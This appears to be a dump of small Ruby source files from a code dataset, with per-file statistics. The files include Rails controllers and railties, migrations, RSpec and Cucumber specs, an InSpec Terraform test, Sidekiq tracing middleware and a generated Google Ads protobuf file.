end
| 25.842105 | 70 | 0.718941 |
6a4edf82cbe246288d3f936d568a0ff6f3f2fe97 | 851 | module Liquid
module Rails
class Railtie < ::Rails::Railtie
config.app_generators.template_engine :liquid
initializer 'liquid-rails.register_template_handler' do |app|
ActiveSupport.on_load(:action_view) do
ActionView::Template.register_template_handler(:liquid, Liquid::Rails::TemplateHandler)
end
end
initializer 'liquid-rails.include_partial' do |app|
template_path = ::Rails.root.join('app/views')
Liquid::Template.file_system = Liquid::Rails::FileSystem.new(template_path)
end
initializer 'liquid-rails.setup_drop' do |app|
[:active_record, :mongoid].each do |orm|
ActiveSupport.on_load orm do
Liquid::Rails.setup_drop self
end
end
end
def self.setup
yield self
end
end
end
end
| 27.451613 | 97 | 0.649824 |
6268321ccde5655d5209b73b30e974ea75950b7f | 91 | require 'rspec'
require 'simplecov'
SimpleCov.start
require 'nikto/version'
include Nikto
| 13 | 23 | 0.802198 |
6a6aeb897bc752a6e9ebf7e933cbd7466814c485 | 640 | class SessionsController < ApplicationController
before_action :require_no_user!, only: [:new, :create]
def new
@user = User.new
render :new
end
def create
@user = User.find_by_credentials(params[:user][:user_name], params[:user][:password])
if @user.nil?
@user = User.new(user_params)
render :new
else
login_user!(@user)
redirect_to cats_url
end
end
def destroy
current_user.reset_session_token! if current_user
session[:session_token] = nil
redirect_to cats_url
end
private
def user_params
params.require(:user).permit(:user_name, :password)
end
end | 20.645161 | 89 | 0.682813 |
916438a2827f07e43c888aa08dc66002c3fb9f43 | 281 | module Frontend
mattr_accessor :organisations_search_client
mattr_accessor :search_client
mattr_accessor :mapit_api
mattr_accessor :imminence_api
mattr_accessor :local_links_manager_api
mattr_accessor :govuk_website_root
mattr_accessor :local_transactions_config
end
| 28.1 | 45 | 0.864769 |
d5ae37bff524380c3a2428b107d0ed67aa3baa2f | 130 | require 'spree_core'
require 'spree_extension'
require 'spree_coinbase_commerce/engine'
require 'spree_coinbase_commerce/version'
| 26 | 41 | 0.861538 |
bbd69b732e5e6c4d147801afed875692659c1e98 | 468 | # Takes the pcgw_games_list.json file and outputs a tab-delimited file for mix'n'match.
require 'open-uri'
require 'json'
require 'cgi'
games_list = JSON.parse(File.read('pcgw_games_list.json'))
games_list.uniq! { |game| game['pcgw_id'].downcase }
game_array = []
games_list.each do |game|
game_array << "#{CGI.unescape(game['pcgw_id'])}\t#{game['title']}\tn/a"
end
File.open("pcgw_catalog.txt", "w+") do |f|
game_array.each { |element| f.puts(element) }
end
| 24.631579 | 87 | 0.702991 |
62734e5415539734714130d810842b5851c9fc40 | 65 | module Ruboty
module Ponpetter
VERSION = "0.0.1"
end
end
| 10.833333 | 21 | 0.661538 |
ffbb1cf94bcb6dd70376975e4d8001770c147f66 | 869 | # More info please refer to: https://www.inspec.io/docs/
# Get path to terraform state file from attribute of kitchen-terraform.
terraform_state = attribute "terraform_state", {}
# Define how critical this control is.
control "state_file" do
# Define how critical this control is.
impact 0.6
# The actual test case.
describe file("terraform.tfstate.d/kitchen-terraform-default-network/terraform.tfstate") do
file = File.read("terraform.tfstate.d/kitchen-terraform-default-network/terraform.tfstate")
# Get json object of terraform state file.
data_hash = JSON.parse(file)
modules = data_hash["modules"]
subject do modules[1]["resources"]["azurerm_virtual_network.vnet"]["type"] end
# Validate the terraform version number field.
it "is valid" do is_expected.to match "azurerm_virtual_network" end
end
end | 37.782609 | 96 | 0.726122 |
6a2eb159467da3b77243f2c07821e3f88b85df5e | 2,352 | # frozen_string_literal: true
require 'database_cleaner'
require 'cucumber/rails/database/strategy'
require 'cucumber/rails/database/deletion_strategy'
require 'cucumber/rails/database/null_strategy'
require 'cucumber/rails/database/shared_connection_strategy'
require 'cucumber/rails/database/truncation_strategy'
require 'cucumber/rails/database'
describe Cucumber::Rails::Database do
let(:strategy) { described_class.instance_variable_get(:@strategy) }
context 'when using a valid pre-determined strategy' do
before { described_class.javascript_strategy = :truncation }
it 'forwards a `before_non_js` event to the selected strategy' do
expect(strategy).to receive(:before_non_js)
described_class.before_non_js
end
it 'forwards a `before_js` event to the selected strategy' do
expect(strategy).to receive(:before_js)
described_class.before_js
end
it 'raises an error on `before_js` if no DatabaseCleaner cleaners exist' do
allow(DatabaseCleaner).to receive(:cleaners).and_return({})
expect { described_class.before_js }
.to raise_error(/No DatabaseCleaner strategies found/)
end
end
context 'when using an invalid pre-determined strategy' do
it 'raises an error if you use a non-understood strategy' do
expect { described_class.javascript_strategy = :invalid }
.to raise_error(Cucumber::Rails::Database::InvalidStrategy)
end
end
context 'when using a valid custom strategy' do
let(:strategy_type) do
Class.new do
def before_js
# Anything
end
def before_non_js
# Likewise
end
end
end
before { described_class.javascript_strategy = strategy_type }
it 'forwards a `before_non_js` event to the strategy' do
expect(strategy).to receive(:before_non_js)
described_class.before_non_js
end
it 'forwards a `before_js` event to the strategy' do
expect(strategy).to receive(:before_js)
described_class.before_js
end
end
context 'when using an invalid custom strategy' do
let(:invalid_strategy) { Class.new }
it 'raises an error if the strategy does not have a valid interface' do
expect { described_class.javascript_strategy = invalid_strategy }
.to raise_error(ArgumentError)
end
end
end
| 29.037037 | 79 | 0.720238 |
4abad6b214ecd31c13366a091af20980757756e9 | 1,685 | # frozen_string_literal: true
# Copyright The OpenTelemetry Authors
#
# SPDX-License-Identifier: Apache-2.0
module OpenTelemetry
module Instrumentation
module Sidekiq
module Middlewares
module Client
# TracerMiddleware propagates context and instruments Sidekiq client
# by way of its middleware system
class TracerMiddleware
def call(_worker_class, job, _queue, _redis_pool) # rubocop:disable Metrics/AbcSize
attributes = {
'messaging.system' => 'sidekiq',
'messaging.sidekiq.job_class' => job['wrapped']&.to_s || job['class'],
'messaging.message_id' => job['jid'],
'messaging.destination' => job['queue'],
'messaging.destination_kind' => 'queue'
}
attributes['peer.service'] = config[:peer_service] if config[:peer_service]
span_name = case config[:span_naming]
when :job_class then "#{job['wrapped']&.to_s || job['class']} send"
else "#{job['queue']} send"
end
tracer.in_span(span_name, attributes: attributes, kind: :producer) do |span|
OpenTelemetry.propagation.inject(job)
span.add_event('created_at', timestamp: job['created_at'])
yield
end
end
private
def config
Sidekiq::Instrumentation.instance.config
end
def tracer
Sidekiq::Instrumentation.instance.tracer
end
end
end
end
end
end
end
| 32.403846 | 95 | 0.549555 |
d54e5af42055049767e40f76840948c9d0fb984d | 223 | class CreateArtists < ActiveRecord::Migration[4.2]
def change
create_table :artists do |t|
t.string :name
t.timestamps
end
change_table :events do |t|
t.integer :artist_id
end
end
end
| 17.153846 | 50 | 0.64574 |
e9d6f7613e1cc08675d04cde1ca1112c9c3e43ca | 281 | # frozen_string_literal: true
module SpreeMailchimpEcommerce
class UpdateProductJob < ApplicationJob
def perform(mailchimp_product)
return unless mailchimp_product
gibbon_store.products(mailchimp_product["id"]).update(body: mailchimp_product)
end
end
end
| 23.416667 | 84 | 0.782918 |
4a1023f911b2e77887adfbf0223e9e87c75358b4 | 116 | class AddStripeIdToUser < ActiveRecord::Migration
def change
add_column :users, :stripe_id, :string
end
end
| 19.333333 | 49 | 0.758621 |
034d6316a188c7d6721ee2494e98123d9ef95499 | 676 | module SlackArena
class Server < SlackRubyBotServer::Server
on :channel_joined do |client, data|
message = 'Welcome to Are.na! Please `/arena connect [channel]` to publish a channel here.'
logger.info "#{client.owner.name}: joined ##{data.channel['name']}."
client.say(channel: data.channel['id'], text: message)
end
on :user_change do |client, data|
user = User.where(team: client.owner, user_id: data.user.id).first
next unless user && user.user_name != data.user.name
logger.info "RENAME: #{user.user_id}, #{user.user_name} => #{data.user.name}"
user.update_attributes!(user_name: data.user.name)
end
end
end
| 37.555556 | 97 | 0.668639 |
6a651b382edc73134c27ed854319fb2b91e168d8 | 1,054 | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: google/ads/googleads/v9/enums/interaction_type.proto
require 'google/api/annotations_pb'
require 'google/protobuf'
Google::Protobuf::DescriptorPool.generated_pool.build do
add_file("google/ads/googleads/v9/enums/interaction_type.proto", :syntax => :proto3) do
add_message "google.ads.googleads.v9.enums.InteractionTypeEnum" do
end
add_enum "google.ads.googleads.v9.enums.InteractionTypeEnum.InteractionType" do
value :UNSPECIFIED, 0
value :UNKNOWN, 1
value :CALLS, 8000
end
end
end
module Google
module Ads
module GoogleAds
module V9
module Enums
InteractionTypeEnum = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.ads.googleads.v9.enums.InteractionTypeEnum").msgclass
InteractionTypeEnum::InteractionType = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.ads.googleads.v9.enums.InteractionTypeEnum.InteractionType").enummodule
end
end
end
end
end
| 34 | 185 | 0.746679 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.